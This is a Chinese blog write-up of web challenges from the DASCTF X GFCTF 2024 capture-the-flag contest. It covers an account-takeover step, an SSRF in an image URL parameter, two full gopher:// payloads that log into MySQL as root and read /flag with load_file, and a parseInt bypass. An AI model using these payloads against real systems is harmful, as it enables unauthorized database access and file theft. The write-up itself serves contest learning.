[部分WP]DASCTF X GFCTF 2024 WEB

最新推荐文章于 2024-07-23 10:52:21 发布
最新推荐文章于 2024-07-23 10:52:21 发布
阅读量419 收藏 7
点赞数 1
分类专栏: DASCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/138122872
版权
文章讲述了利用Web应用的越权和SSRF漏洞,通过gopher协议攻击MySQL数据库的过程,包括注册用户、URL编码技巧和获取flag的详细步骤,涉及SuiteCRM和WordPress环境。
摘要由CSDN通过智能技术生成

Web

EasySignin

考点: 越权+SSRF gopher协议去攻击mysql

通过注册任意用户修改admin密码

登入然后点击康好看图片 抓包

 ?url  典型SSRF漏洞 尝试file读取/etc/passwd无果

尝试gopher协议去攻击mysql 利用工具gopherus 盲猜数据库用户为root

 然后再次次url编码得到 库名为test

为什么要进行URL编码 - 降瑞雪 - 博客园 (cnblogs.com)

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2510%2500%2500%2500%2503%2573%2568%256f%2577%2520%2564%2561%2574%2561%2562%2561%2573%2565%2573%253b%2501%2500%2500%2500%2501

 

直接读取根目录的flag

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%24%00%00%00%03%75%73%65%20%74%65%73%74%3b%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%2f%66%6c%61%67%27%29%3b%01%00%00%00%01

发包得到flag 

 cool_index

 考点: parselnt()函数漏洞

注册任意用户之后 查看附件发现flag在第八页(index=8)

当index>=7时需要会员解锁 

 但index =paeseint(index);这时候就存在漏洞了,即

所以我们直接修改为7a得到flag

SuiteCRM 

DASCTF X GFCTF 2024 官方WP (yuque.com)

web1234

W3nd4L0v3
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
六月DASCTFre方面wp
weixin_43990313的博客
06-28 400
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
2021 DASCTF X BUUOJ 五月大联动WP
lifanxin的博客
05-30 1769
DASCTF X BUUOJ 五月大联动WP概述pwnDASCTF_X_BUUOJ_2021_ticketDASCTF_X_BUUOJ_2021_cardre总结 概述   这个五月我又参加了一次不留痕迹的ctf比赛,之所以叫不留痕迹,是因为总是拿不到好的名次????,比赛结束前1小时还能苟进前10,不过后面还是被反超了。不好在安慰自己,新手嘛,刚刚上路,稳扎稳打,持续努力,定有收获。   这个比赛完整环境可以在buuoj上找到,简单分析一下题目分布情况,pwn 2道,re 2道,web 2道,crypto
DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)
susu_xiaosu的博客
07-08 637
【代码】DASCTF X GFCTF 2024|四月开启第一局[PWN] wp(详解)
DASCTF2024暑期挑战赛
mumuzi的博客
07-22 429
见https://mumuzi.ctf.center/docs/Blog/CTFWP/DASCTF2024%E6%9A%91%E6%9C%9F%E6%8C%91%E6%88%98%E8%B5%9B。
DASCTF2024暑期挑战赛|为热爱,并肩作战
最新发布
hyq99999的博客
07-23 1386
python原型链污染
DASCTF3月赛re部分wp
n1ptune__的博客
03-27 429
做出两道re,被大佬们带躺了个12 Enjoyit-1 这题送分题 .net程序,用dnspy反编译,主要逻辑如下 b.b检查输入是否在’_'和’z’之间 b.c是一个改表base64 写脚本解出符合条件的输入 import base64 src='abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ=' aaa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
2023年楚慧杯(DASCTF)WP
ZJPC007的博客
12-18 741
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。最后以一题之差屈居第二。
Dasctf web 2道题的wp
Airwooh的博客
08-02 403
就出了两道web 太菜了 总排名44 eur1ka yyds web1 Google 搜了一下 是前几天爆出的一个洞 直接打就出来了 web2 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); .
DASCTF2020-7月赛 部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 1997
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比赛时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.
华三H3C WP2024 POE交换机PSE版本210文件
01-11
华三H3C WP2024 POE交换机PSE版本210文件,用于解决端口异常断电、无法供电等问题。
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1340
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3499
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
DASCTF X CBCTF 2022九月挑战赛 bar wp
qq_65147345的博客
10-03 227
思路: 1. 通过漏洞改写fd打tcache attack
DASCTF2022十月挑战赛部分WP
东隅的博客
10-25 1375
DASCTF2022十月挑战赛部分WP.看题目源码,有4个类,开始的时候看到了fine类里面的call_user_func,最终应该是打进这个地方,另外看到了 secret_code 类里面的hint()函数,所以我的想法路线是先想办法调用出这个hint()函数,然后根据给出的hint进入那个call_user_func,然后就开始找链子,但是最终hint()函数给出的东西真是让我摸不到头脑,就只好不管这个hint直接打进call_user_func进行rce了。
2021DASCTF八月挑战赛WP
克格莫(有需要的私信)
08-31 484
1.签到 略。 2.[crypto]easymath 参考:https://zhuanlan.zhihu.com/p/363648238 exp: s_shift = 1862790884563160582365888530869690397667546628710795031544304378154769559410473276482265448754388655981091313419549689169381115573539422545933044902527020209259938095466283
# Dasctf 7月赋能赛 WP
as you know, nlp is fantasitc!
07-27 570
每次通过比赛都能学到很多东西,对于之前的知识点有一知半解的地方重新认识了,比如ssti的盲注,以前只知道{{}}、{%%}能执行语句,但是没有想过他们的区别,通过一道ssti的题目就能更加深入地区分这两者的区别。...
2022DASCTF Apr X FATE CTF部分wp
3tefanie丶zhou的博客
04-25 3079
【只是两个人相处,那么喜欢一个人,可能会觉得她哪里都好,但是以后在一起了,就要学会喜欢她的不好】
DASCTF X GFCTF 2024|四月开启第一局 —— re前三题wp
Air_cat的博客
04-21 834
DASCTF X GFCTF 2024|四月开启第一局 re前三题writeup
2020DASCT圣诞节-web-wp
Firebasky的博客
12-26 395
圣诞节打的。质量一般吧,只不过是原题。hhh~ 最后名次不怎么样 优胜奖 链接:https://pan.baidu.com/s/1L1bbEqiVcIleruggAxum8A 提取码:jpx3 复制这段内容后打开百度网盘手机App,操作更方便哦
FlatScience-WP web安全挑战:SQLite3注入与PDF密码解析
"该资源是关于攻防世界Web进阶挑战的一个案例,主要涉及Web安全中的SQL注入漏洞利用。挑战者需要通过分析源代码、理解SQLite3数据库的使用,并利用SQL注入来获取敏感信息。此外,还涉及到PDF文件的解析和SHA1哈希...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值